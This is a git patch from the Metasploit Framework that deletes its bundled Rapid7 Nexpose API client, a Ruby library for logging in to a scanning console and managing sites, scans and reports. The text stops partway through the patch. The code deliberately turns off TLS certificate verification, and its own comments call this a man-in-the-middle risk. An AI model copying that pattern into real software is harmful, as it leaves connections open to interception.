From eeba1e0bb2c797ebfe6f7fecba95f8956c69361c Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Jan 2017 10:13:28 -0600 Subject: [PATCH 01/37] first pass of upgrading nexpose gem to latest --- lib/rapid7/nexpose.rb | 2618 ---------------------------------- metasploit-framework.gemspec | 2 + plugins/nexpose.rb | 115 +- 3 files changed, 62 insertions(+), 2673 deletions(-) delete mode 100644 lib/rapid7/nexpose.rb diff --git a/lib/rapid7/nexpose.rb b/lib/rapid7/nexpose.rb deleted file mode 100644 index e8b0c6e34d..0000000000 --- a/lib/rapid7/nexpose.rb +++ /dev/null @@ -1,2618 +0,0 @@ -# -# The Nexpose API -# -=begin - -Copyright (C) 2009-2012, Rapid7, Inc. -All rights reserved. - -Redistribution and use in source and binary forms, with or without modification, -are permitted provided that the following conditions are met: - - * Redistributions of source code must retain the above copyright notice, - this list of conditions and the following disclaimer. - - * Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - - * Neither the name of Rapid7, Inc. nor the names of its contributors - may be used to endorse or promote products derived from this software - without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR -ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON -ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -=end - -# -# WARNING! This code makes an SSL connection to the Nexpose server, but does NOT -# verify the certificate at this time. This can be a security issue if -# an attacker is able to man-in-the-middle the connection between the -# Metasploit console and the Nexpose server. In the common case of -# running Nexpose and Metasploit on the same host, this is a low risk. -# - -# -# WARNING! This code is still rough and going through substantive changes. While -# you can build tools using this library today, keep in mind that method -# names and parameters may change in the future. -# - -require 'date' -require 'rexml/document' -require 'net/https' -require 'net/http' -require 'uri' -require 'rex/mime' - - -module Nexpose - -module Sanitize - def replace_entities(str) - ret = str.dup - ret.gsub!(/&/, "&") - ret.gsub!(/'/, "'") - ret.gsub!(/"/, """) - ret.gsub!(//, ">") - ret - end -end - -class APIError < ::RuntimeError - attr_accessor :req, :reason - def initialize(req, reason = '') - self.req = req - self.reason = reason - end - def to_s - "NexposeAPI: #{self.reason}" - end -end - -class AuthenticationFailed < APIError - def initialize(req) - self.req = req - self.reason = "Login Failed" - end -end - -module XMLUtils - def parse_xml(xml) - ::REXML::Document.new(xml.to_s) - end -end - -class APIRequest - include XMLUtils - - attr_reader :http - attr_reader :uri - attr_reader :headers - attr_reader :retry_count - attr_reader :time_out - attr_reader :pause - - attr_reader :req - attr_reader :res - attr_reader :sid - attr_reader :success - - attr_reader :error - attr_reader :trace - - attr_reader :raw_response - attr_reader :raw_response_data - - def initialize(req, url) - @url = url - @req = req - prepare_http_client - end - - def prepare_http_client - @retry_count = 0 - @retry_count_max = 10 - @time_out = 30 - @pause = 2 - @uri = URI.parse(@url) - @http = ::Net::HTTP.new(@uri.host, @uri.port) - @http.use_ssl = true - # - # XXX: This is obviously a security issue, however, we handle this at the client level by forcing - # a confirmation when the nexpose host is not localhost. In a perfect world, we would present - # the server signature before accepting it, but this requires either a direct callback inside - # of this module back to whatever UI, or opens a race condition between accept and attempt. - # - @http.verify_mode = OpenSSL::SSL::VERIFY_NONE - @headers = {'Content-Type' => 'text/xml'} - @success = false - end - - def execute - @conn_tries = 0 - - begin - prepare_http_client - - @raw_response = @http.post(@uri.path, @req, @headers) - @raw_response_data = @raw_response.body - @res = parse_xml(@raw_response_data) - - if(not @res.root) - @error = "Nexpose service returned invalid XML" - return @sid - end - - @sid = attributes['session-id'] - - @success = true - - if(attributes['success'] and attributes['success'].to_i == 0) - @success = false - end - - # Look for a stack trace - @res.elements.each('//Failure/Exception') do |s| - - # 1.1 returns lower case elements - s.elements.each('message') do |m| - @error = m.text - end - s.elements.each('stacktrace') do |m| - @trace = m.text - end - - # 1.2 returns capitalized elements - s.elements.each('Message') do |m| - @error = m.text - end - s.elements.each('Stacktrace') do |m| - @trace = m.text - end - end - - @res.elements.each('//Failure') do |s| - - # 1.1 returns lower case elements - s.elements.each('message') do |m| - @error = m.text - end - s.elements.each('stacktrace') do |m| - @trace = m.text - end - - # 1.2 returns capitalized elements - s.elements.each('Message') do |m| - @error = m.text - end - s.elements.each('Stacktrace') do |m| - @trace = m.text - end - end - - # This is a hack to handle corner cases where a heavily loaded Nexpose instance - # drops our HTTP connection before processing. We try 5 times to establish a - # connection in these situations. The actual exception occurs in the Ruby - # http library, which is why we use such generic error classes. - rescue ::ArgumentError, ::NoMethodError - if @conn_tries < 5 - @conn_tries += 1 - retry - end - rescue ::Timeout::Error - if @conn_tries < 5 - @conn_tries += 1 - retry - end - @error = "Nexpose host did not respond" - rescue ::SocketError, ::Errno::EHOSTUNREACH,::Errno::ENETDOWN,::Errno::ENETUNREACH,::Errno::ENETRESET,::Errno::EHOSTDOWN,::Errno::EACCES,::Errno::EINVAL,::Errno::EADDRNOTAVAIL - @error = "Nexpose host is unreachable" - # Handle console-level interrupts - rescue ::Interrupt - @error = "Received a user interrupt" - rescue ::Errno::ECONNRESET,::Errno::ECONNREFUSED,::Errno::ENOTCONN,::Errno::ECONNABORTED, ::OpenSSL::SSL::SSLError - @error = "Nexpose service is not available" - rescue ::REXML::ParseException - @error = "Nexpose has not been properly licensed" - end - - @success = false if @error - - @sid - end - - def attributes(*args) - return if not @res.root - @res.root.attributes(*args) - end - - def self.execute(url,req) - obj = self.new(req,url) - obj.execute - if(not obj.success) - raise APIError.new(obj, "Action failed: #{obj.error}") - end - obj - end - -end - -module NexposeAPI - - def make_xml(name, opts={}, data='') - xml = REXML::Element.new(name) - if(@session_id) - xml.attributes['session-id'] = @session_id - end - - opts.keys.each do |k| - xml.attributes[k] = "#{opts[k]}" - end - - xml.text = data - - xml - end - - def make_xml_plain(name, opts={}, data='') - xml = REXML::Element.new(name) - - opts.keys.each do |k| - xml.attributes[k] = "#{opts[k]}" - end - - xml.text = data - - xml - end - def scan_stop(param) - r = execute(make_xml('ScanStopRequest', { 'scan-id' => param })) - r.success - end - - def scan_status(param) - r = execute(make_xml('ScanStatusRequest', { 'scan-id' => param })) - r.success ? r.attributes['status'] : nil - end - - def scan_activity - r = execute(make_xml('ScanActivityRequest', { })) - if(r.success) - res = [] - r.res.elements.each("//ScanSummary") do |scan| - res << { - :scan_id => scan.attributes['scan-id'].to_i, - :site_id => scan.attributes['site-id'].to_i, - :engine_id => scan.attributes['engine-id'].to_i, - :status => scan.attributes['status'].to_s, - :start_time => Date.parse(scan.attributes['startTime'].to_s).to_time - } - end - return res - else - return false - end - end - - def scan_statistics(param) - r = execute(make_xml('ScanStatisticsRequest', {'scan-id' => param })) - if(r.success) - res = {} - r.res.elements.each("//ScanSummary/nodes") do |node| - res[:nodes] = {} - node.attributes.keys.each do |k| - res[:nodes][k] = node.attributes[k].to_i - end - end - r.res.elements.each("//ScanSummary/tasks") do |task| - res[:task] = {} - task.attributes.keys.each do |k| - res[:task][k] = task.attributes[k].to_i - end - end - r.res.elements.each("//ScanSummary/vulnerabilities") do |vuln| - res[:vulns] ||= {} - k = vuln.attributes['status'] + (vuln.attributes['severity'] ? ("-" + vuln.attributes['severity']) : '') - res[:vulns][k] = vuln.attributes['count'].to_i - end - r.res.elements.each("//ScanSummary") do |summ| - res[:summary] = {} - summ.attributes.keys.each do |k| - res[:summary][k] = summ.attributes[k] - if (res[:summary][k] =~ /^\d+$/) - res[:summary][k] = res[:summary][k].to_i - end - end - end - r.res.elements.each("//ScanSummary/message") do |message| - res[:message] = message.text - end - return res - else - return false - end - end - - def report_generate(param) - r = execute(make_xml('ReportGenerateRequest', { 'report-id' => param })) - r.success - end - - def report_last(param) - r = execute(make_xml('ReportHistoryRequest', { 'reportcfg-id' => param })) - res = nil - if(r.success) - stk = [] - r.res.elements.each("//ReportSummary") do |rep| - stk << [ rep.attributes['id'].to_i, rep.attributes['report-URI'] ] - end - if (stk.length > 0) - stk.sort!{|a,b| b[0] <=> a[0]} - res = stk[0][1] - end - end - res - end - - def report_last_detail(param) - r = execute(make_xml('ReportHistoryRequest', { 'reportcfg-id' => param })) - res = nil - if(r.success) - stk = {} - r.res.elements.each("//ReportSummary") do |rep| - stk[ rep.attributes['id'].to_i ] = { - 'id' => rep.attributes['id'].to_i, - 'url' => rep.attributes['report-URI'], - 'status' => rep.attributes['status'], - 'date' => rep.attributes['generated-on'] - } - end - if (stk.keys.length > 0) - res = stk[ stk.keys.sort{|a,b| b[0] <=> a[0]}.first ] - end - end - res - end - - def report_history(param) - execute(make_xml('ReportHistoryRequest', { 'reportcfg-id' => param })) - end - - def report_config_delete(param) - r = execute(make_xml('ReportDeleteRequest', { 'reportcfg-id' => param })) - r.success - end - - def report_delete(param) - r = execute(make_xml('ReportDeleteRequest', { 'report-id' => param })) - r.success - end - - def device_delete(param) - r = execute(make_xml('DeviceDeleteRequest', { 'device-id' => param })) - r.success - end - - def vuln_exception_create(vuln_id, reason, scope, comment='', attrs={}) - attrs = attrs.merge({ 'vuln-id' => vuln_id, 'reason' => reason, 'scope' => scope }) - req = make_xml('VulnerabilityExceptionCreateRequest', attrs) - com = make_xml_plain('comment', {}, comment.to_s) - req << com - r = execute(req, '1.2') - end - - def vuln_exception_approve(exception_id, comment='', attrs={}) - attrs = attrs.merge({ 'exception-id' => exception_id }) - req = make_xml('VulnerabilityExceptionApproveRequest', attrs) - com = make_xml_plain('comment', {}, comment.to_s) - req << com - r = execute(req, '1.2') - end - - def vuln_exception_update_expiration(exception_id, expiration_date, attrs={}) - attrs = attrs.merge({ 'exception-id' => exception_id, 'expiration-date' => expiration_date }) - req = make_xml('VulnerabilityExceptionUpdateExpirationDateRequest', attrs) - r = execute(req, '1.2') - end - - def asset_group_delete(connection, id, debug = false) - r = execute(make_xml('AssetGroupDeleteRequest', { 'group-id' => param })) - r.success - end - - def asset_group_create(name, description, devices) - req = make_xml('AssetGroupSaveRequest') - req_ag = make_xml_plain('AssetGroup', { 'id' => "-1", 'name' => name, 'description' => description }) - req_devices = make_xml_plain('Devices') - devices.each do |did| - req_devices << make_xml_plain('device', { 'id' => did }) - end - req_ag << req_devices - req << req_ag - r = execute(req) - end - - #------------------------------------------------------------------------- - # Returns all asset group information - #------------------------------------------------------------------------- - def asset_groups_listing() - r = execute(make_xml('AssetGroupListingRequest')) - - if r.success - res = [] - r.res.elements.each('//AssetGroupSummary') do |group| - res << { - :asset_group_id => group.attributes['id'].to_i, - :name => group.attributes['name'].to_s, - :description => group.attributes['description'].to_s, - :risk_score => group.attributes['riskscore'].to_f, - } - end - res - else - false - end - end - - #------------------------------------------------------------------------- - # Returns an asset group configuration information for a specific group ID - #------------------------------------------------------------------------- - def asset_group_config(group_id) - r = execute(make_xml('AssetGroupConfigRequest', {'group-id' => group_id})) - - if r.success - res = [] - r.res.elements.each('//Devices/device') do |device_info| - res << { - :device_id => device_info.attributes['id'].to_i, - :site_id => device_info.attributes['site-id'].to_i, - :address => device_info.attributes['address'].to_s, - :riskfactor => device_info.attributes['riskfactor'].to_f, - } - end - res - else - false - end - end - - #----------------------------------------------------------------------- - # Starts device specific site scanning. - # - # devices - An Array of device IDs - # hosts - An Array of Hashes [o]=>{:range=>"to,from"} [1]=>{:host=>host} - #----------------------------------------------------------------------- - def site_device_scan_start(site_id, devices, hosts) - - if hosts == nil and devices == nil - raise ArgumentError.new("Both the device and host list is nil") - end - - xml = make_xml('SiteDevicesScanRequest', {'site-id' => site_id}) - - if devices != nil - inner_xml = REXML::Element.new 'Devices' - for device_id in devices - inner_xml.add_element 'device', {'id' => "#{device_id}"} - end - xml.add_element inner_xml - end - - if hosts != nil - inner_xml = REXML::Element.new 'Hosts' - hosts.each_index do |x| - if hosts[x].key? :range - to = hosts[x][:range].split(',')[0] - from = hosts[x][:range].split(',')[1] - inner_xml.add_element 'range', {'to' => "#{to}", 'from' => "#{from}"} - end - if hosts[x].key? :host - host_element = REXML::Element.new 'host' - host_element.text = "#{hosts[x][:host]}" - inner_xml.add_element host_element - end - end - xml.add_element inner_xml - end - - r = execute xml - if r.success - r.res.elements.each('//Scan') do |scan_info| - return { - :scan_id => scan_info.attributes['scan-id'].to_i, - :engine_id => scan_info.attributes['engine-id'].to_i - } - end - else - false - end - end - - def site_delete(param) - r = execute(make_xml('SiteDeleteRequest', { 'site-id' => param })) - r.success - end - - def site_listing - r = execute(make_xml('SiteListingRequest', { })) - - if(r.success) - res = [] - r.res.elements.each("//SiteSummary") do |site| - res << { - :site_id => site.attributes['id'].to_i, - :name => site.attributes['name'].to_s, - :risk_factor => site.attributes['riskfactor'].to_f, - :risk_score => site.attributes['riskscore'].to_f, - } - end - return res - else - return false - end - end - - #----------------------------------------------------------------------- - # TODO: Needs to be expanded to included details - #----------------------------------------------------------------------- - def site_scan_history(site_id) - r = execute(make_xml('SiteScanHistoryRequest', {'site-id' => site_id.to_s})) - - if (r.success) - res = [] - r.res.elements.each("//ScanSummary") do |site_scan_history| - res << { - :site_id => site_scan_history.attributes['site-id'].to_i, - :scan_id => site_scan_history.attributes['scan-id'].to_i, - :engine_id => site_scan_history.attributes['engine-id'].to_i, - :start_time => site_scan_history.attributes['startTime'].to_s, - :end_time => site_scan_history.attributes['endTime'].to_s - } - end - return res - else - false - end - end - - def site_device_listing(site_id) - r = execute(make_xml('SiteDeviceListingRequest', { 'site-id' => site_id.to_s })) - - if(r.success) - res = [] - r.res.elements.each("//device") do |device| - res << { - :device_id => device.attributes['id'].to_i, - :address => device.attributes['address'].to_s, - :risk_factor => device.attributes['riskfactor'].to_f, - :risk_score => device.attributes['riskscore'].to_f, - } - end - return res - else - return false - end - end - - def report_template_listing - r = execute(make_xml('ReportTemplateListingRequest', { })) - - if(r.success) - res = [] - r.res.elements.each("//ReportTemplateSummary") do |template| - desc = '' - template.elements.each("//description") do |ent| - desc = ent.text - end - - res << { - :template_id => template.attributes['id'].to_s, - :name => template.attributes['name'].to_s, - :description => desc.to_s - } - end - return res - else - return false - end - end - - - def console_command(cmd_string) - xml = make_xml('ConsoleCommandRequest', { }) - cmd = REXML::Element.new('Command') - cmd.text = cmd_string - xml << cmd - - r = execute(xml) - - if(r.success) - res = "" - r.res.elements.each("//Output") do |out| - res << out.text.to_s - end - - return res - else - return false - end - end - - def system_information - r = execute(make_xml('SystemInformationRequest', { })) - - if(r.success) - res = {} - r.res.elements.each("//Statistic") do |stat| - res[ stat.attributes['name'].to_s ] = stat.text.to_s - end - - return res - else - return false - end - end - -end - -# === Description -# Object that represents a connection to a Nexpose Security Console. -# -# === Examples -# # Create a new Nexpose Connection on the default port -# nsc = Connection.new("10.1.40.10","nxadmin","password") -# -# # Login to NSC and Establish a Session ID -# nsc.login() -# -# # Check Session ID -# if (nsc.session_id) -# puts "Login Successful" -# else -# puts "Login Failure" -# end -# -# # //Logout -# logout_success = nsc.logout() -# if (! logout_success) -# puts "Logout Failure" + "

" + nsc.error_msg.to_s -# end -# -class Connection - include XMLUtils - include NexposeAPI - - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # Session ID of this connection - attr_reader :session_id - # The hostname or IP Address of the NSC - attr_reader :host - # The port of the NSC (default is 3780) - attr_reader :port - # The username used to login to the NSC - attr_reader :username - # The password used to login to the NSC - attr_reader :password - # The URL for communication - attr_reader :url - - # Constructor for Connection - def initialize(ip, user, pass, port = 3780) - @host = ip - @port = port - @username = user - @password = pass - @session_id = nil - @error = false - @url = "https://#{@host}:#{@port}/api/1.1/xml" - @url_base = "https://#{@host}:#{@port}/api/" - end - - # Establish a new connection and Session ID - def login - - # This throws an APIError exception if necessary - r = execute(make_xml('LoginRequest', { 'sync-id' => 0, 'password' => @password, 'user-id' => @username })) - if(r.success) - @session_id = r.sid - return true - end - - false - end - - # Logout of the current connection - def logout - # Bypass logout unless we have an actual session ID - return true unless @session_id - - r = execute(make_xml('LogoutRequest', {'sync-id' => 0})) - if(r.success) - return true - end - raise APIError.new(r, 'Logout failed') - end - - # Execute an API request - def execute(xml, version='1.1') - APIRequest.execute("#{@url_base}#{version}/xml", xml.to_s) - end - - # Download a specific URL - def download(url) - uri = URI.parse(url) - http = Net::HTTP.new(@host, @port) - http.use_ssl = true - http.verify_mode = OpenSSL::SSL::VERIFY_NONE # XXX: security issue - headers = {'Cookie' => "nexposeCCSessionID=#{@session_id}"} - resp = http.get(uri.path, headers) - - resp ? resp.body : nil - end -end - -# === Description -# Object that represents a listing of all of the sites available on an NSC. -# -# === Example -# # Create a new Nexpose Connection on the default port and Login -# nsc = Connection.new("10.1.40.10","nxadmin","password") -# nsc->login(); -# -# # Get Site Listing -# sitelisting = SiteListing.new(nsc) -# -# # Enumerate through all of the SiteSummaries -# sitelisting.sites.each do |sitesummary| -# # Do some operation on each site -# end -# -class SiteListing - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # Array containing SiteSummary objects for each site in the connection - attr_reader :sites - # The number of sites - attr_reader :site_count - - # Constructor - # SiteListing (connection) - def initialize(connection) - @sites = [] - - @connection = connection - - r = @connection.execute('') - - if (r.success) - parse(r.res) - else - raise APIError.new(r, "Failed to get site listing") - end - end - - def parse(r) - r.elements.each('SiteListingResponse/SiteSummary') do |s| - site_summary = SiteSummary.new( - s.attributes['id'].to_s, - s.attributes['name'].to_s, - s.attributes['description'].to_s, - s.attributes['riskfactor'].to_s - ) - @sites.push(site_summary) - end - @site_count = @sites.length - end -end - -# === Description -# Object that represents the summary of a Nexpose Site. -# -class SiteSummary - # The Site ID - attr_reader :id - # The Site Name - attr_reader :site_name - # A Description of the Site - attr_reader :description - # User assigned risk multiplier - attr_reader :riskfactor - - # Constructor - # SiteSummary(id, site_name, description, riskfactor = 1) - def initialize(id, site_name, description, riskfactor = 1) - @id = id - @site_name = site_name - @description = description - @riskfactor = riskfactor - end - - def _set_id(id) - @id = id - end -end - -# === Description -# Object that represents a single IP address or an inclusive range of IP addresses. If to is nil then the from field will be used to specify a single IP Address only. -# -class IPRange - # Start of Range *Required - attr_reader :from; - # End of Range *Optional (If Null then IPRange is a single IP Address) - attr_reader :to; - - def initialize(from, to = nil) - @from = from - @to = to - end - - include Sanitize - def to_xml - if (to and not to.empty?) - return %Q{} - else - return %Q{} - end - end -end - -# === Description -# Object that represents a hostname to be added to a site. -class HostName - - # The hostname - attr_reader :hostname - - def initialize(hostname) - @hostname = hostname - end - - include Sanitize - def to_xml - "#{replace_entities(hostname)}" - end -end - -# === Description -# Object that represents the configuration of a Site. This object is automatically created when a new Site object is instantiated. -# -class SiteConfig - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # The Site ID - attr_reader :site_id - # The Site Name - attr_reader :site_name - # A Description of the Site - attr_reader :description - # User assigned risk multiplier - attr_reader :riskfactor - # Array containing ((IPRange|HostName)*) - attr_reader :hosts - # Array containing (AdminCredentials*) - attr_reader :credentials - # Array containing ((SmtpAlera|SnmpAlert|SyslogAlert)*) - attr_reader :alerts - # ScanConfig object which holds Schedule and ScanTrigger Objects - attr_reader :scanConfig - - def initialize() - @xml_tag_stack = Array.new() - @hosts = Array.new() - @credentials = Array.new() - @alerts = Array.new() - @error = false - end - - # Adds a new host to the hosts array - def addHost(host) - @hosts.push(host) - end - - # Adds a new alert to the alerts array - def addAlert(alert) - @alerts.push(alert) - end - - # Adds a new set of credentials to the credentials array - def addCredentials(credential) - @credentials.push(credential) - end - - # TODO - def getSiteConfig(connection,site_id) - @connection = connection - @site_id = site_id - - r = APIRequest.execute(@connection.url,'') - parse(r.res) - end - - def _set_site_id(site_id) - @site_id = site_id - end - - def _set_site_name(site_name) - @site_name = site_name - end - - def _set_description(description) - @description = description - end - - def _set_riskfactor(riskfactor) - @riskfactor = riskfactor - end - - def _set_scanConfig(scanConfig) - @scanConfig = scanConfig - end - - def _set_connection(connection) - @connection = connection - end -=begin - - - - - - - - - - - - - - - - - -=end - - def parse(response) - response.elements.each('SiteConfigResponse/Site') do |s| - @site_id = s.attributes['id'] - @site_name = s.attributes['name'] - @description = s.attributes['description'] - @riskfactor = s.attributes['riskfactor'] - s.elements.each('Hosts/range') do |r| - @hosts.push(IPRange.new(r.attributes['from'],r.attributes['to'])) - end - s.elements.each('ScanConfig') do |c| - @scanConfig = ScanConfig.new(c.attributes['configID'], - c.attributes['name'], - c.attributes['configVersion'], - c.attributes['templateID']) - s.elements.each('Schedule') do |schedule| - schedule = new Schedule(schedule.attributes["type"], schedule.attributes["interval"], schedule.attributes["start"], schedule.attributes["enabled"]) - @scanConfig.addSchedule(schedule) - end - end - - s.elements.each('Alerting/Alert') do |a| - - a.elements.each('smtpAlert') do |smtp| - smtp_alert = SmtpAlert.new(a.attributes["name"], smtp.attributes["sender"], smtp.attributes["limitText"], a.attributes["enabled"]) - - smtp.elements.each('recipient') do |recipient| - smtp_alert.addRecipient(recipient.text) - end - @alerts.push(smtp_alert) - end - - a.elements.each('snmpAlert') do |snmp| - snmp_alert = SnmpAlert.new(a.attributes["name"], snmp.attributes["community"], snmp.attributes["server"], a.attributes["enabled"]) - @alerts.push(snmp_alert) - end - a.elements.each('syslogAlert') do |syslog| - syslog_alert = SyslogAlert.new(a.attributes["name"], syslog.attributes["server"], a.attributes["enabled"]) - @alerts.push(syslog_alert) - end - - a.elements.each('vulnFilter') do |vulnFilter| - - #vulnfilter = new VulnFilter.new(a.attributes["typemask"], a.attributes["severityThreshold"], $attrs["MAXALERTS"]) - # Pop off the top alert on the stack - #$alert = @alerts.pop() - # Add the new recipient string to the Alert Object - #$alert.setVulnFilter($vulnfilter) - # Push the alert back on to the alert stack - #array_push($this->alerts, $alert) - end - - a.elements.each('scanFilter') do |scanFilter| - # - #scanfilter = ScanFilter.new(scanFilter.attributes['scanStop'],scanFilter.attributes['scanFailed'],scanFilter.attributes['scanStart']) - #alert = @alerts.pop() - #alert.setScanFilter(scanfilter) - #@alerts.push(alert) - end - end - end - end -end - -# === Description -# Object that represents the scan history of a site. -# -class SiteScanHistory - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # The Site ID - attr_reader :site_id - # //Array containing (ScanSummary*) - attr_reader :scan_summaries - - def initialize(connection, id) - @site_id = id - @error = false - @connection = connection - @scan_summaries = Array.new() - - r = @connection.execute('') - status = r.success - end -end - -# === Description -# Object that represents a listing of devices for a site or the entire NSC. Note that only devices which are accessible to the account used to create the connection object will be returned. This object is created and populated automatically with the instantiation of a new Site object. -# -class SiteDeviceListing - - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # The Site ID. 0 if all sites are specified. - attr_reader :site_id - # //Array of (Device)* - attr_reader :devices - - def initialize(connection, site_id = 0) - - @site_id = site_id - @error = false - @connection = connection - @devices = Array.new() - - r = nil - if (@site_id) - r = @connection.execute('') - else - r = @connection.execute('') - end - - if(r.success) - response.elements.each('SiteDeviceListingResponse/SiteDevices/device') do |d| - @devices.push(Device.new(d.attributes['id'],@site_id,d.attributes["address"],d.attributes["riskfactor"],d.attributes['riskscore'])) - end - end - end -end - -# === Description -# Object that represents a site, including the site configuration, scan history, and device listing. -# -# === Example -# # Create a new Nexpose Connection on the default port and Login -# nsc = Connection.new("10.1.40.10","nxadmin","password") -# nsc.login() -# -# # Get an Existing Site -# site_existing = Site.new(nsc,184) -# -# # Create a New Site, add some hosts, and save it to the NSC -# site = Site.new(nsc) -# site.setSiteConfig("New Site", "New Site Created in the API") -# -# # Add the hosts -# site.site_config.addHost(HostName.new("localhost")) -# site.site_config.addHost(IPRange.new("192.168.7.1","192.168.7.255")) -# site.site_config.addHost(IPRange.new("10.1.20.30")) -# -# status = site.saveSite() -# -class Site - # true if an error condition exists; false otherwise - attr_reader :error - # Error message string - attr_reader :error_msg - # The last XML request sent by this object - attr_reader :request_xml - # The last XML response received by this object - attr_reader :response_xml - # The NSC Connection associated with this object - attr_reader :connection - # The Site ID - # site_id = -1 means create a new site. The NSC will assign a new site_id on SiteSave. - attr_reader :site_id - # A summary overview of this site - # SiteSummary Object - attr_reader :site_summary - # The configuration of this site - # SiteConfig Object - attr_reader :site_config - # The device listing for this site - # SiteDeviceListing Object - attr_reader :site_device_listing - # The scan history of this site - # SiteScanHistory Object - attr_reader :site_scan_history - - def initialize(connection, site_id = -1) - @error = false - @connection = connection - @site_id = site_id - - # If site_id > 0 then get SiteConfig - if (@site_id.to_i > 0) - # Create new SiteConfig object - @site_config = SiteConfig.new() - # Populate SiteConfig Obect with Data from the NSC - @site_config.getSiteConfig(@connection,@site_id) - @site_summary = SiteSummary.new(@site_id, @site_config.site_name, @site_config.description, @site_config.riskfactor) - @site_scan_history = SiteScanHistory.new(@connection,@site_id) - @site_device_listing = SiteDeviceListing.new(@connection,@site_id) - - else - # Just in case user enters a number > -1 or = 0 - @site_id = -1 - - @site_config = SiteConfig.new() - setSiteConfig("New Site " + rand(999999999999).to_s,"") - @site_summary = nil - - end - - end - - # Creates a new site summary - def setSiteSummary(site_name, description, riskfactor = 1) - @site_summary = SiteSummary.new(-1,site_name,description,riskfactor) - - end - - # Creates a new site configuration - def setSiteConfig(site_name, description, riskfactor = 1) - setSiteSummary(site_name,description,riskfactor) - @site_config = SiteConfig.new() - @site_config._set_site_id(-1) - @site_config._set_site_name(site_name) - @site_config._set_description(description) - @site_config._set_riskfactor(riskfactor) - @site_config._set_scanConfig(ScanConfig.new(-1,"tmp","full-audit")) - @site_config._set_connection(@connection) - - end - - # Initiates a scan of this site. If successful returns scan_id and engine_id in an associative array. Returns false if scan is unsuccessful. - def scanSite() - r = @connection.execute('') - if(r.success) - res = {} - r.res.elements.each('//Scan/') do |s| - res[:scan_id] = s.attributes['scan-id'] - res[:engine_id] = s.attributes['engine-id'] - end - return res - else - return false - end - end - - # Saves this site in the NSC - def saveSite() - r = @connection.execute('' + getSiteXML() + ' ') - if (r.success) - @site_id = r.attributes['site-id'] - @site_config._set_site_id(@site_id) - @site_config.scanConfig._set_configID(@site_id) - @site_config.scanConfig._set_name(@site_id) - return true - else - return false - end - end - - def deleteSite() - r = @connection.execute('') - r.success - end - - - def printSite() - puts "Site ID: " + @site_summary.id - puts "Site Name: " + @site_summary.site_name - puts "Site Description: " + @site_summary.description - puts "Site Risk Factor: " + @site_summary.riskfactor - end - - def getSiteXML() - - xml = '' - - xml << ' ' - @site_config.hosts.each do |h| - xml << h.to_xml if h.respond_to? :to_xml - end - xml << '' - - xml << '' - @site_config.credentials.each do |c| - xml << c.to_xml if c.respond_to? :to_xml - end - xml << ' ' - - xml << ' ' - @site_config.alerts.each do |a| - xml << a.to_xml if a.respond_to? :to_xml - end - xml << ' ' - - xml << ' ' - - xml << ' ' - @site_config.scanConfig.schedules.each do |s| - xml << ' ' - end - xml << ' ' - - xml << ' ' - @site_config.scanConfig.scanTriggers.each do |s| - - if s.kind_of?(Nexpose::AutoUpdate) - xml << ' ' - end - end - - xml << ' ' - - xml << ' ' - - xml << ' ' - - return xml - end -end - -# === Description -# Object that represents administrative credentials to be used during a scan. When retrived from an existing site configuration the credentials will be returned as a security blob and can only be passed back as is during a Site Save operation. This object can only be used to create a new set of credentials. -# -class AdminCredentials - # Security blob for an existing set of credentials - attr_reader :securityblob - # Designates if this object contains user defined credentials or a security blob - attr_reader :isblob - # The service for these credentials. Can be All. - attr_reader :service - # The host for these credentials. Can be Any. - attr_reader :host - # The port on which to use these credentials. - attr_reader :port - # The user id or username - attr_reader :userid - # The password - attr_reader :password - # The realm for these credentials - attr_reader :realm - - - def initialize(isblob = false) - @isblob = isblob - end - - # Sets the credentials information for this object. - def setCredentials(service, host, port, userid, password, realm) - @isblob = false - @securityblob = nil - @service = service - @host = host - @port = port - @userid = userid - @password = password - @realm = realm - end - - # TODO: add description - def setService(service) - @service = service - end - - def setHost(host) - @host = host - end - - # TODO: add description - def setBlob(securityblob) - @isblob = true - @securityblob = securityblob - end - - include Sanitize - def to_xml - xml = '' - xml << '' - xml << replace_entities(securityblob) if (isblob) - xml << '' - - xml - end -end - - -# === Description -# Object that represents an SMTP (Email) Alert. -# -class SmtpAlert - # A unique name for this alert - attr_reader :name - # If this alert is enabled or not - attr_reader :enabled - # The email address of the sender - attr_reader :sender - # Limit the text for mobile devices - attr_reader :limitText - # Array containing Strings of email addresses - # Array of strings with the email addresses of the intended recipients 